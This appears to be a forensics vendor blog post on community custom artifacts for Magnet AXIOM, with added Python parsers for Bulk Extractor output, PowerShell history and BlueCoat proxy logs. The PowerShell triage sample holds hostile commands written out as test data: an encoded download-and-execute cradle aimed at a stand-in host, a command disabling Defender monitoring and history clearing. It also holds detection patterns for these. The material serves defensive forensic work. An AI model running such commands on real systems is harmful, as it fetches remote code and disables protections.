Highlighting Some Custom Artifacts in the Artifact Exchange
The volume of digital data and the number of applications available to users on Windows, macOS, and mobile devices can be overwhelming. As such, commercial tools understandably cannot keep up with every new and updated application when parsing your evidence sources. Additionally, in your organization's forensic lab you may be dealing with multiple sources of data on top of your forensic images, such as network logs and the output of other forensic tools. Luckily, Magnet AXIOM lets you create, use, and share custom artifacts for those times when you come across data that AXIOM does not yet support.
With custom artifacts, you can process unsupported data from your evidence and analyze it alongside the hundreds of artifacts that AXIOM already supports! The Artifact Exchange on the Magnet Forensics Resource Center provides details on how to create your own custom artifacts, to equip and inspire you to write and share. You can write custom artifacts in either XML or Python, or simply use the Magnet Custom Artifact Generator (MCAG), which makes custom artifact creation nearly effortless! But you don't have to create your own to take advantage of the dozens of custom artifacts already available in the Artifact Exchange. You can immediately download and use this collection of custom artifacts, created by folks throughout the DFIR community, in your examinations, and we're aiming to highlight just a few!
ILEAPP Parsing
One huge benefit of custom artifacts is the ability to take the output from other tools in your toolkit and review that data alongside AXIOM's own artifact support. Known in the DFIR community for his many contributions, Alexis Brignoni is also the largest contributor to the Artifact Exchange (thanks Alexis!). Among the many custom artifacts he has written and submitted over the years is the collection associated with the output of his own forensic parser, ILEAPP. Using these custom artifacts, you can process the output from ILEAPP and view and analyze Connected Devices, Account Data, Calendar Data, and more, all within AXIOM. This is a great way to validate the output of different tools against each other within one user interface.
Bulk Extractor
Magnet's own Jad Saliba has provided a number of custom artifacts on the Artifact Exchange, most recently adding the ability to process Bulk Extractor output in AXIOM. If you're familiar with Bulk Extractor, you may know that its output is written to a set of text files (one feature file per scanner, plus histogram summaries), all of which can provide a wealth of useful data for your case. The Artifact Exchange has two custom artifacts that load these text files as an evidence source and give you a unified view of all of the data within AXIOM, where you can sort, filter, and analyze it. Just add the entire Bulk Extractor output folder, where the text files were saved, as evidence, and the custom artifacts written by Jad will run against the applicable files. AXIOM will also denote which Bulk Extractor text file each record was processed from, as seen in the screenshot below.
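To make the layout concrete, here is an added example (my own code, not one of the Artifact Exchange custom artifacts and not part of the original post) that walks a Bulk Extractor output folder, parses the tab-separated feature files while skipping the `*_histogram.txt` summaries and `report.xml`, and tags each record with the text file it came from, which is the same per-file attribution AXIOM shows. The sample output folder, file names, and feature values are constructed for this example.

```python
import os
import tempfile
from collections import Counter
from dataclasses import dataclass
from typing import Dict, Iterator, List


@dataclass
class Feature:
    source_file: str  # bulk_extractor text file the record came from (e.g. email.txt)
    offset: str       # byte offset, or a forensic path such as "2097152-GZIP-512"
    feature: str      # the extracted value (email address, URL, ...)
    context: str      # surrounding bytes, escaped the way bulk_extractor writes them


def parse_feature_file(path: str) -> Iterator[Feature]:
    """Yield one Feature per data line of a bulk_extractor feature file.

    Lines beginning with '#' are header/comment lines; every other line is
    offset<TAB>feature<TAB>context (context may be absent).
    """
    name = os.path.basename(path)
    with open(path, encoding="utf-8", errors="replace") as fh:
        for raw in fh:
            line = raw.rstrip("\r\n")
            if not line or line.startswith("#"):
                continue
            parts = line.split("\t")
            if len(parts) < 2:
                continue  # not a feature line; skip it rather than abort the file
            context = parts[2] if len(parts) > 2 else ""
            yield Feature(name, parts[0], parts[1], context)


def is_feature_file(name: str) -> bool:
    """Histograms (email_histogram.txt) and report.xml are not feature files."""
    return name.endswith(".txt") and not name.endswith("_histogram.txt")


def load_output_folder(folder: str) -> List[Feature]:
    """Parse every feature file in a bulk_extractor output folder."""
    records: List[Feature] = []
    for name in sorted(os.listdir(folder)):
        if is_feature_file(name):
            records.extend(parse_feature_file(os.path.join(folder, name)))
    return records


def count_by_source(records: List[Feature]) -> Dict[str, int]:
    """How many records each text file contributed."""
    return dict(Counter(r.source_file for r in records))


# Constructed sample output folder; the contents are made up for this example.
SAMPLE_FILES = {
    "email.txt": (
        "# BANNER FILE NOT PROVIDED (-b option)\n"
        "# BULK_EXTRACTOR-Version: 1.6.0\n"
        "# Feature-Recorder: email\n"
        "# Filename: image.E01\n"
        "# Feature-File-Version: 1.1\n"
        "1048576\talice@example.com\tFrom: alice@example.com\\x0D\\x0A\n"
        "2097152-GZIP-512\tbob@example.org\t<bob@example.org>\n"
    ),
    "url.txt": (
        "# Feature-Recorder: url\n"
        "4096\thttp://www.example.com/login\tGET http://www.example.com/login HTTP/1.1\n"
    ),
    "email_histogram.txt": "# Feature-Recorder: email\nn=1\talice@example.com\n",
    "report.xml": "<dfxml version='1.0'></dfxml>\n",
}


def write_sample_folder(folder: str) -> None:
    for name, body in SAMPLE_FILES.items():
        with open(os.path.join(folder, name), "w", encoding="utf-8") as fh:
            fh.write(body)


def demo() -> List[Feature]:
    """Write the constructed folder to a temp dir and parse it."""
    with tempfile.TemporaryDirectory() as folder:
        write_sample_folder(folder)
        return load_output_folder(folder)


if __name__ == "__main__":
    for rec in demo():
        print(f"{rec.source_file:12} {rec.offset:>18} {rec.feature}")
    print(count_by_source(demo()))
```

Point `load_output_folder()` at a real Bulk Extractor output directory to get the same per-file attribution; the forensic-path offsets (such as `2097152-GZIP-512`) are kept as strings because they are not plain integers.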
PowerShell History
If you find yourself analyzing a Windows endpoint and need an artifact showing what commands a savvy user ran in PowerShell, you're covered! Yogesh Khatri authored a custom artifact that parses the PowerShell command history from the ConsoleHost_history.txt file. This can provide real insight into a user's activities, and can be especially useful if they were using PowerShell for nefarious purposes. Keep in mind that this file is written by the PSReadLine module for interactive console sessions, lives under each user's profile at %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\, records commands without timestamps, and can be disabled or deleted by the user, so an empty or missing file is not proof that PowerShell was never used.
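As an added example (my own code, not Yogesh's custom artifact and not from the original post), here is a small parser and triage pass for ConsoleHost_history.txt. It rejoins multi-line commands (PSReadLine stores them with a trailing backtick on every line but the last), decodes `-EncodedCommand` payloads, which are Base64 of UTF-16LE text, and flags a few common attacker patterns. The sample history is constructed for the example, and the pattern list is an illustrative assumption rather than a complete ruleset.

```python
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Illustrative patterns; an assumption for this example, not a complete ruleset.
SUSPICIOUS = [
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), "invoke-expression"),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer", re.I),
     "download cradle"),
    (re.compile(r"set-mppreference\b.*disable", re.I), "defender tampering"),
    (re.compile(r"clear-history|remove-item\b.*consolehost_history", re.I), "anti-forensics"),
]
# powershell.exe accepts -EncodedCommand, -enc, -ec and -e, followed by Base64.
ENCODED_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/]{16,}={0,2})", re.I)


@dataclass
class Finding:
    command: str
    reasons: List[str] = field(default_factory=list)
    decoded: Optional[str] = None   # decoded -EncodedCommand payload, if any


def parse_history(text: str) -> List[str]:
    """Return the commands in a ConsoleHost_history.txt, rejoining multi-line ones."""
    commands, pending = [], []
    for line in text.splitlines():
        if line.endswith("`"):
            pending.append(line[:-1])   # continuation line: drop the marker, keep going
            continue
        pending.append(line)
        commands.append("\n".join(pending))
        pending = []
    if pending:                         # file ended in the middle of a command
        commands.append("\n".join(pending))
    return [c for c in commands if c.strip()]


def decode_encoded_command(b64: str) -> Optional[str]:
    """-EncodedCommand carries Base64 of UTF-16LE text; return None if it is not."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(commands: List[str]) -> List[Finding]:
    """Flag commands matching the patterns, scanning decoded payloads as well."""
    findings = []
    for cmd in commands:
        f = Finding(cmd)
        m = ENCODED_RE.search(cmd)
        if m:
            f.decoded = decode_encoded_command(m.group(1))
            if f.decoded is not None:
                f.reasons.append("encoded command")
        for text in (cmd, f.decoded or ""):
            for pattern, reason in SUSPICIOUS:
                if pattern.search(text) and reason not in f.reasons:
                    f.reasons.append(reason)
        if f.reasons:
            findings.append(f)
    return findings


# Constructed sample: the encoded payload is built here so it decodes correctly.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")

# Constructed sample history in the layout PSReadLine writes to
# %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
SAMPLE_HISTORY = "\n".join([
    "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5",
    "Get-ChildItem C:\\Users `",
    "    -Recurse -Include *.kdbx",
    "whoami /all",
    "powershell -nop -w hidden -e " + ENCODED,
    "Set-MpPreference -DisableRealtimeMonitoring $true",
    "Clear-History",
]) + "\n"


def demo() -> List[Finding]:
    return triage(parse_history(SAMPLE_HISTORY))


if __name__ == "__main__":
    for f in demo():
        print(", ".join(f.reasons), "->", f.command[:60])
        if f.decoded:
            print("   decoded:", f.decoded)
```

Because the history file carries no timestamps, pair any hit with other sources (event logs, prefetch, AXIOM's own timeline) before building a sequence of events; the order of lines is the only ordering the file gives you.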
BlueCoat Proxy Logs
Find yourself analyzing logs from various sources when a case arises? If you're dealing with BlueCoat proxy logs, don't worry, Trey Amick has a custom artifact for you! Simply add your log files to your case as evidence and process them with this custom artifact for an easy way to view and analyze the log data.
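Blue Coat ProxySG access logs are W3C Extended Log File Format text: a `#Fields:` header names the columns, `-` marks an empty value, and values that can contain spaces (categories, User-Agent) are double-quoted. As an added example (my own code, not Trey's custom artifact and not from the original post), the parser below reads that header, keys every record by field name, skips truncated lines without dropping the rest of the log, and runs a small triage pass. The log lines and the triage rules are constructed for this example.

```python
import csv
import ipaddress
from datetime import datetime
from typing import Dict, List, Tuple

# Illustrative, an assumption for this example rather than an exhaustive list.
RISKY_EXTENSIONS = {"exe", "dll", "ps1", "vbs", "hta", "scr", "msi"}


def parse_bluecoat(text: str) -> Tuple[List[Dict[str, object]], List[int]]:
    """Parse ELFF access-log text into dicts keyed by the #Fields names.

    Returns (records, skipped_line_numbers); a line whose field count does not
    match the header (typically a truncated last line) is skipped, not fatal.
    """
    fields: List[str] = []
    records: List[Dict[str, object]] = []
    skipped: List[int] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()
            continue  # #Software, #Version, #Date carry no records
        if not fields:
            raise ValueError(f"line {lineno}: data before a #Fields: header")
        try:
            # Space-delimited with double-quoted values; csv handles the quoting.
            values = next(csv.reader([line], delimiter=" ", quotechar='"'))
        except csv.Error:
            skipped.append(lineno)
            continue
        if len(values) != len(fields):
            skipped.append(lineno)
            continue
        rec: Dict[str, object] = dict(zip(fields, values))
        rec["timestamp"] = datetime.strptime(f"{rec['date']} {rec['time']}", "%Y-%m-%d %H:%M:%S")
        for key in ("time-taken", "sc-status", "sc-bytes", "cs-bytes"):
            if rec.get(key) not in (None, "-"):
                rec[key] = int(str(rec[key]))
        records.append(rec)
    return records, skipped


def is_ip_literal(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def triage(records: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Flag requests an examiner would look at first; the reasons are illustrative."""
    flagged = []
    for rec in records:
        reasons = []
        if rec["sc-filter-result"] == "DENIED":
            reasons.append("blocked by proxy policy")
        if "Malicious" in str(rec["cs-categories"]):
            reasons.append("malicious category")
        if is_ip_literal(str(rec["cs-host"])):
            reasons.append("direct-to-IP request")
        if str(rec["cs-uri-extension"]).lower() in RISKY_EXTENSIONS:
            reasons.append("risky file extension")
        if reasons:
            flagged.append({**rec, "reasons": reasons})
    return flagged


# Constructed sample log (hosts, users and addresses are made up); the last
# line is deliberately truncated, as a rotated log often is.
SAMPLE_LOG = """#Software: SGOS 6.7.4.1
#Version: 1.0
#Date: 2023-01-15 00:00:00
#Fields: date time time-taken c-ip cs-username cs-auth-group x-exception-id sc-filter-result cs-categories cs(Referer) sc-status s-action cs-method rs(Content-Type) cs-uri-scheme cs-host cs-uri-port cs-uri-path cs-uri-query cs-uri-extension cs(User-Agent) s-ip sc-bytes cs-bytes x-virus-id
2023-01-15 08:01:02 120 10.0.0.5 jdoe - - OBSERVED "Technology/Internet" - 200 TCP_NC_MISS GET text/html http www.example.com 80 / - - "Mozilla/5.0 (Windows NT 10.0)" 10.0.0.1 5123 611 -
2023-01-15 08:03:10 15 10.0.0.5 jdoe - policy_denied DENIED "Malicious Sources/Malnets" - 403 TCP_DENIED GET - http 203.0.113.7 80 /update.exe - exe "Mozilla/5.0 (Windows NT 10.0)" 10.0.0.1 1024 512 -
2023-01-15 08:05:44 2300 10.0.0.9 - - - OBSERVED "Uncategorized" - 200 TCP_NC_MISS GET application/octet-stream http 198.51.100.23 8080 /a/payload.ps1 - ps1 "python-requests/2.28" 10.0.0.1 240113 390 -
2023-01-15 08:06:00 40 10.0.0.9 - - - OBSERVED "Uncat
"""


def demo() -> List[Dict[str, object]]:
    records, skipped = parse_bluecoat(SAMPLE_LOG)
    print(f"parsed {len(records)} records, skipped lines {skipped}")
    return triage(records)


if __name__ == "__main__":
    for rec in demo():
        print(rec["timestamp"], rec["c-ip"], rec["cs-host"], rec["cs-uri-path"], rec["reasons"])
```

Keying records by the `#Fields:` names rather than by position matters because different ProxySG log formats (and customer-defined ones) reorder and add columns; the same code then handles all of them as long as the header is present.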
Download and Submit Custom Artifacts at the Artifact Exchange
Hop on over to the Artifact Exchange today to download these and other custom artifacts for your examinations, written by the DFIR community, for the DFIR community! And don't forget to submit the custom artifacts you've created for your own examinations. You never know who might need those results in their casework, and how far-reaching your impact could be!